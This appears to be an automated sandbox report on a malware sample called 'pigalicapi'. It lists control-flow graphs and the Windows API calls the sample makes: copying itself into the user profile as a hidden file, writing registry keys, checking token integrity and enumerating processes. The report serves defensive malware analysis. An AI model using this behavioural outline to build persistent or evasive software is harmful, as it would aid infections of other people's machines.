                                                                                                                                                                                control_flow_graph 298 5d62b0-5d62c4 299 5d6c4e 298->299 300 5d62ca-5d62ce 298->300 301 5d6c51-5d6c54 299->301 300->299 302 5d62d4-5d62e0 300->302 302->299 303 5d62e6-5d62ed 302->303 303->299 304 5d62f3-5d6314 303->304 306 5d642e-5d6453 304->306 307 5d631a-5d631e 304->307 313 5d6c2f-5d6c36 306->313 314 5d6459-5d645d 306->314 309 5d6320-5d633a 307->309 310 5d6343-5d6363 307->310 309->310 315 5d633c-5d633e 309->315 311 5d6429 310->311 312 5d6369-5d6375 310->312 311->306 312->311 316 5d637b-5d6384 312->316 319 5d6c38-5d6c42 313->319 320 5d6c44 313->320 317 5d645f-5d6479 314->317 318 5d6482-5d64a2 314->318 315->301 316->311 321 5d638a-5d6393 316->321 317->318 322 5d647b-5d647d 317->322 323 5d64a8-5d64b4 318->323 324 5d65f3-5d65fc 318->324 319->299 320->299 321->311 325 5d6399-5d63a2 321->325 322->301 323->324 326 5d64ba-5d654c GetEnvironmentVariableA call 5d7d20 call 5d9730 GetTickCount GetTempFileNameA CreateFileA 323->326 327 5d65fe 324->327 328 5d6603-5d660f 324->328 331 5d63a4-5d63ca VirtualAlloc 325->331 332 5d6410-5d6424 call 5d1ee0 325->332 326->324 358 5d6552-5d6586 WriteFile 326->358 327->328 329 5d6bdd-5d6be9 328->329 330 5d6615-5d6621 328->330 337 5d6c18-5d6c24 329->337 338 5d6beb-5d6bf7 329->338 330->329 334 5d6627-5d6640 call 5d7250 330->334 335 5d63cc-5d63e4 call 5d6260 331->335 336 5d640e 331->336 344 5d6427 332->344 353 5d6647-5d664e 334->353 354 5d6642 334->354 355 5d63fd-5d6408 VirtualFree 335->355 356 5d63e6-5d63fa call 5d1ee0 335->356 336->344 345 5d6c2a 337->345 346 5d6c26 337->346 338->337 343 5d6bf9-5d6c16 call 5da360 338->343 343->345 344->306 345->345 346->345 361 5d6654-5d6674 VirtualAlloc 353->361 362 5d6752-5d675b 353->362 354->353 355->336 356->355 359 5d65dd-5d65e4 358->359 360 5d6588-5d6591 358->360 359->324 369 5d65e6-5d65ed CloseHandle 359->369 360->359 366 5d6593-5d65c7 CloseHandle call 5d6c60 call 5d1e60 360->366 361->362 367 5d667a-5d6747 call 5d7b70 call 5d97a0 CreateThread CloseHandle 361->367 364 5d69ba-5d6a49 GetEnvironmentVariableA call 5d7d20 call 5d9730 GetTickCount GetTempFileNameA CreateFileA 362->364 365 5d6761-5d6788 362->365 399 5d6a4f-5d6a75 364->399 400 5d6bd6 364->400 370 5d678e-5d67c0 VirtualAlloc 365->370 371 5d6858-5d6864 call 5d2070 365->371 397 5d65c9-5d65d0 call 5d74a0 ExitProcess 366->397 398 5d65d8 call 5d6cf0 366->398 367->362 369->324 375 5d6856 370->375 376 5d67c6-5d67e7 call 5d6260 370->376 385 5d686a-5d6871 371->385 375->385 395 5d67e9-5d6807 call 5d2070 376->395 396 5d6842-5d6850 VirtualFree 376->396 387 5d6877-5d687e 385->387 388 5d69b0 385->388 393 5d6894-5d689d 387->393 394 5d6880-5d6891 call 5d73c0 387->394 388->364 402 5d698a-5d6993 393->402 403 5d68a3-5d68c8 call 5d97a0 393->403 394->393 395->396 422 5d6809-5d683a VirtualAlloc call 5d7b70 395->422 396->375 398->359 407 5d6b1e-5d6b3c WriteFile 399->407 408 5d6a7b-5d6aad VirtualAlloc 399->408 400->329 409 5d69a9 402->409 410 5d6995-5d69a6 call 5d2510 402->410 427 5d68e9-5d690d VirtualAlloc 403->427 428 5d68ca-5d68e7 403->428 412 5d6b42-5d6b49 407->412 416 5d6b1c 408->416 417 5d6aaf-5d6ad0 call 5d6260 408->417 409->388 410->409 419 5d6bc9-5d6bd0 CloseHandle 412->419 420 5d6b4b-5d6b57 412->420 416->412 430 5d6b08-5d6b16 VirtualFree 417->430 431 5d6ad2-5d6b02 WriteFile 417->431 419->400 420->419 426 5d6b59-5d6b82 CloseHandle call 5d1e60 420->426 434 5d683f 422->434 439 5d6b84-5d6b8b 426->439 440 5d6bc7 426->440 433 5d6934-5d693d 427->433 435 5d690f-5d6931 call 5d7b70 427->435 428->433 430->416 431->430 433->402 438 5d693f-5d6984 CreateThread CloseHandle 433->438 434->396 435->433 438->402 442 5d6b8d-5d6b9e call 5d73c0 439->442 443 5d6ba1-5d6baa 439->443 440->400 442->443 445 5d6bac-5d6bbd call 5d2510 443->445 446 5d6bc0 443->446 445->446 446->440
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D63BD
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 005D6408
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                                • String ID: TEMP$TEMP$Wopkesjym
                                                                                                                                                                                • API String ID: 2087232378-2311138816
                                                                                                                                                                                • Opcode ID: 3e3c11c0e081ce64e4234d006ecbddf133ea289965fb53eb4b70175d5ba7695c
                                                                                                                                                                                • Instruction ID: 0a35da873d91d9c5458e25123eeff85b631a7763a953bff1da132d88f4a7501b
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e3c11c0e081ce64e4234d006ecbddf133ea289965fb53eb4b70175d5ba7695c
                                                                                                                                                                                • Instruction Fuzzy Hash: F3522EB4A01219DFDB24DF98DC89BADBBB5BB48300F14858BE509A7391D770AD85CF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 005D4066
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 005D407A
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?), ref: 005D40AF
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D40C6
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 005D40E6
                                                                                                                                                                                • ResetEvent.KERNEL32(00000000), ref: 005D40F7
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 005D4101
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 005D4118
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 005D41DD
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 005D41F7
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005D420C
                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 005D4216
                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 005D422D
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 005D423C
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 005D4258
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 005D426D
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 005D4277
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D428E
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 005D42A6
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(?,?), ref: 005D42D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1593741596-0
                                                                                                                                                                                • Opcode ID: 431171894bdcbb1ebbfb5cca014c46f0148625236fcc6ce753fc627a2ea7d36d
                                                                                                                                                                                • Instruction ID: e9d7aa6d62eeadaba663c95c8487402918a393b9d0e87bf062178c9d1ec374e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 431171894bdcbb1ebbfb5cca014c46f0148625236fcc6ce753fc627a2ea7d36d
                                                                                                                                                                                • Instruction Fuzzy Hash: DF9104B4941219EBDB24DFE8D889BADBFB5BB58304F10821BFA05AB380D7749944CF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 567 5d1120-5d1134 568 5d12bb-5d12c1 567->568 569 5d113a-5d113e 567->569 569->568 570 5d1144-5d1150 lstrlenA 569->570 570->568 571 5d1156-5d1162 lstrlenA 570->571 571->568 572 5d1168-5d1175 571->572 573 5d118a-5d119b GetEnvironmentVariableA 572->573 574 5d1177-5d1188 GetAllUsersProfileDirectoryA 572->574 575 5d11a1-5d11d9 wnsprintfA lstrcmpiA 573->575 574->575 576 5d11db-5d11e1 575->576 577 5d1216-5d1287 call 5d97a0 lstrcpyA * 2 CreateThread 575->577 576->577 578 5d11e3-5d1210 CopyFileA SetFileAttributesA lstrcpyA 576->578 581 5d1289-5d128d 577->581 582 5d12a3-5d12b8 call 5d97c0 577->582 578->577 583 5d128f-5d1298 581->583 584 5d129a-5d12a1 581->584 582->568 583->584 584->568
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D1148
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D115A
                                                                                                                                                                                • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 005D1182
                                                                                                                                                                                  • Part of subcall function 005D97C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005D97CF
                                                                                                                                                                                  • Part of subcall function 005D97C0: RtlFreeHeap.NTDLL(00000000), ref: 005D97D6
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 005D119B
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 005D11BD
                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000104,?), ref: 005D11D1
                                                                                                                                                                                • CopyFileA.KERNEL32 ref: 005D11F0
                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000006), ref: 005D11FF
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000104,?), ref: 005D1210
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 005D1249
                                                                                                                                                                                • lstrcpyA.KERNEL32(-00000208,00000000), ref: 005D125D
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 005D1274
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                • String ID: %s\%s.exe$/<]$USERPROFILE
                                                                                                                                                                                • API String ID: 1231128424-1392769249
                                                                                                                                                                                • Opcode ID: c08bdbaae09082f78afb511481a7ed91c11d3aea0b31c700ef8858656fafb128
                                                                                                                                                                                • Instruction ID: 8b7b0a460155a5b151e9897819c4b1021ec93ae07345d223dda1111b82fda58a
                                                                                                                                                                                • Opcode Fuzzy Hash: c08bdbaae09082f78afb511481a7ed91c11d3aea0b31c700ef8858656fafb128
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E415E75901219FBDB24CFA5DC89BDE7BB4BB48701F04819BEA0996290DB74DA84CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 005D8F80: GetVersionExA.KERNEL32(0000009C), ref: 005D8FF7
                                                                                                                                                                                  • Part of subcall function 005D8F80: GetSystemInfo.KERNEL32(?), ref: 005D9009
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 005D902E
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrcatA.KERNEL32(00000000,_x64), ref: 005D9222
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrlenA.KERNEL32(?), ref: 005D922F
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrcatA.KERNEL32(00000000,005DC980), ref: 005D9242
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrcatA.KERNEL32(00000000,?), ref: 005D9253
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrlenA.KERNEL32(00000000), ref: 005D925D
                                                                                                                                                                                  • Part of subcall function 005D8F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 005D9275
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 005D5742
                                                                                                                                                                                  • Part of subcall function 005D1CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005D1CB1
                                                                                                                                                                                  • Part of subcall function 005D1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 005D1CE1
                                                                                                                                                                                  • Part of subcall function 005D1CA0: GetCurrentProcessId.KERNEL32 ref: 005D1CEE
                                                                                                                                                                                  • Part of subcall function 005D1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 005D1D52
                                                                                                                                                                                  • Part of subcall function 005D1CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 005D1D78
                                                                                                                                                                                  • Part of subcall function 005D1CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 005D1D92
                                                                                                                                                                                  • Part of subcall function 005D1CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005D1DA6
                                                                                                                                                                                  • Part of subcall function 005D1CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 005D1DDC
                                                                                                                                                                                  • Part of subcall function 005D1CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,005D575B,00000000,?,00000004,00000000), ref: 005D1DFB
                                                                                                                                                                                  • Part of subcall function 005D1CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,005D575B,00000000,?,00000004,00000000), ref: 005D1E21
                                                                                                                                                                                  • Part of subcall function 005D1CA0: CloseHandle.KERNEL32(000000FF), ref: 005D1E4B
                                                                                                                                                                                  • Part of subcall function 005D9D20: GetSystemDirectoryA.KERNEL32 ref: 005D9D9A
                                                                                                                                                                                  • Part of subcall function 005D9D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 005D9DDD
                                                                                                                                                                                  • Part of subcall function 005D9D20: StringFromCLSID.OLE32(00000020,?), ref: 005D9EF7
                                                                                                                                                                                  • Part of subcall function 005D5CD0: lstrlenA.KERNEL32(00000000), ref: 005D5CEB
                                                                                                                                                                                  • Part of subcall function 005D5CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D5D10
                                                                                                                                                                                  • Part of subcall function 005D5CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 005D5D29
                                                                                                                                                                                  • Part of subcall function 005D5CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D5D45
                                                                                                                                                                                  • Part of subcall function 005D5CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 005D5D6D
                                                                                                                                                                                  • Part of subcall function 005D5CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D5D99
                                                                                                                                                                                  • Part of subcall function 005D5CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 005D5DA3
                                                                                                                                                                                • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 005D57B8
                                                                                                                                                                                • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 005D57F1
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 005D580A
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 005D582F
                                                                                                                                                                                • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D5854
                                                                                                                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 005D586D
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D5896
                                                                                                                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 005D58D0
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D5912
                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 005D591C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                • API String ID: 1116761331-4090404022
                                                                                                                                                                                • Opcode ID: 84d6ea3047938fc899c2058545a9dfb618690438b3ce19f7725d70181a75a2b1
                                                                                                                                                                                • Instruction ID: edf1b6046651666a44939f0f6df2d76afa681c62ab53d1decd5ade04de811aca
                                                                                                                                                                                • Opcode Fuzzy Hash: 84d6ea3047938fc899c2058545a9dfb618690438b3ce19f7725d70181a75a2b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D51A0B0901219EBDB20DBA4DC59FAE7B34AB48705F00819AF6096A381D774AA84CF94
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 005D9A0A
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 005D9A11
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 005D9A3A
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 005D9A77
                                                                                                                                                                                • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 005D9AAD
                                                                                                                                                                                • EqualSid.ADVAPI32(?,00000000), ref: 005D9AC3
                                                                                                                                                                                • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 005D9AE6
                                                                                                                                                                                • EqualSid.ADVAPI32(?), ref: 005D9AFC
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 005D9B7A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                • String ID: D
                                                                                                                                                                                • API String ID: 98007406-2746444292
                                                                                                                                                                                • Opcode ID: b293fbb04064e0d3b6bfe64a8df9f9d665b4d37f1127f05bc2e43e698a4a6d65
                                                                                                                                                                                • Instruction ID: a2fc6602b188ae3c68a144a226deb96205373be2b5df6b926a8dc4a2185b6f8c
                                                                                                                                                                                • Opcode Fuzzy Hash: b293fbb04064e0d3b6bfe64a8df9f9d665b4d37f1127f05bc2e43e698a4a6d65
                                                                                                                                                                                • Instruction Fuzzy Hash: BE411F75A05218DBDB30CB54DC49FDABBBCBF48700F00C1D6A64996280DA709A46DFA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 751 5d5a00-5d5a12 752 5d5a18-5d5a1c 751->752 753 5d5b44-5d5b4b 751->753 752->753 754 5d5a22-5d5a26 752->754 754->753 755 5d5a2c-5d5a86 call 5d7d20 lstrcpyA call 5d5930 call 5d7d20 lstrlenA 754->755 755->753 762 5d5a8c-5d5ab9 lstrcpyA lstrlenA * 2 755->762 762->753 763 5d5abf-5d5b08 lstrcatA RegCreateKeyExA 762->763 764 5d5b0a-5d5b14 RegCloseKey 763->764 765 5d5b16-5d5b31 call 5d7d20 lstrcpyA 763->765 766 5d5b37-5d5b41 lstrlenA 764->766 765->766 766->753
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcpyA.KERNEL32(Mrktsgokwkyai,WDefault), ref: 005D5A47
                                                                                                                                                                                  • Part of subcall function 005D5930: CharUpperA.USER32(00000000), ref: 005D59E2
                                                                                                                                                                                • lstrlenA.KERNEL32(005DC4E0), ref: 005D5A7D
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,005DC4E0), ref: 005D5A97
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D5AA1
                                                                                                                                                                                • lstrlenA.KERNEL32(Mrktsgokwkyai), ref: 005D5AAE
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,Mrktsgokwkyai), ref: 005D5AC8
                                                                                                                                                                                • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 005D5B00
                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 005D5B0E
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 005D5B31
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D5B3B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                • String ID: Mrktsgokwkyai$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                • API String ID: 4161867159-1898305094
                                                                                                                                                                                • Opcode ID: 60c369ca508e9d311e32d78e774f4ded866ae2cf02fa50aca66ae0f44b89bd5c
                                                                                                                                                                                • Instruction ID: b83648c97bee782b4a02056fd9eee748f41257fd5f6601a1e42c49672ad08195
                                                                                                                                                                                • Opcode Fuzzy Hash: 60c369ca508e9d311e32d78e774f4ded866ae2cf02fa50aca66ae0f44b89bd5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 75315075601209FBEB24DFA8DC4AFAE3F75BB48704F008507FA199B281D7709644DB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcpyA.KERNEL32(?,pigalicapi), ref: 005D5F67
                                                                                                                                                                                • lstrcatA.KERNEL32(?,005E3FE2), ref: 005D5F7A
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,X<],00000000,000F003F,00000000), ref: 005D5FB3
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 005D5FF2
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 005D603B
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 005D6045
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                • String ID: $ $X<]$pigalicapi$?^
                                                                                                                                                                                • API String ID: 764223185-2345652832
                                                                                                                                                                                • Opcode ID: 1078863253720e851a1a178a62a6037a855168a8b3fafb6079f49881d1c8d216
                                                                                                                                                                                • Instruction ID: 4ace4fb52b95d3a4d96e5578b401027e2159e7d1d16c9721e98bea173f64a5e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 1078863253720e851a1a178a62a6037a855168a8b3fafb6079f49881d1c8d216
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A3198B190021DEBDB24CF94DC4AFFEBB78BB18700F04848AF645A6281E7B55A44DF60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?), ref: 005D40AF
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D40C6
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 005D40E6
                                                                                                                                                                                • ResetEvent.KERNEL32(00000000), ref: 005D40F7
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 005D4101
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 005D4118
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 005D41DD
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 005D41F7
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005D420C
                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 005D4216
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(?,?), ref: 005D42D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 371823443-0
                                                                                                                                                                                • Opcode ID: 8aaf66588dc281dfba4a7efa2b8a61c2ced58e60eaf343a236073682a80a96fd
                                                                                                                                                                                • Instruction ID: 331f33ec2d21e47745ab688d4fa868dac4dbaf391b5991c19fc331879d55b092
                                                                                                                                                                                • Opcode Fuzzy Hash: 8aaf66588dc281dfba4a7efa2b8a61c2ced58e60eaf343a236073682a80a96fd
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A51E3B5A41219EFDB24DFE8D889BADBBB2BB58704F10411AF905AB380D770A944CF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 005D5E7E
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 005D5EB2
                                                                                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,?), ref: 005D5ED6
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 005D5F0B
                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 005D5F19
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                • String ID: $ $9<]
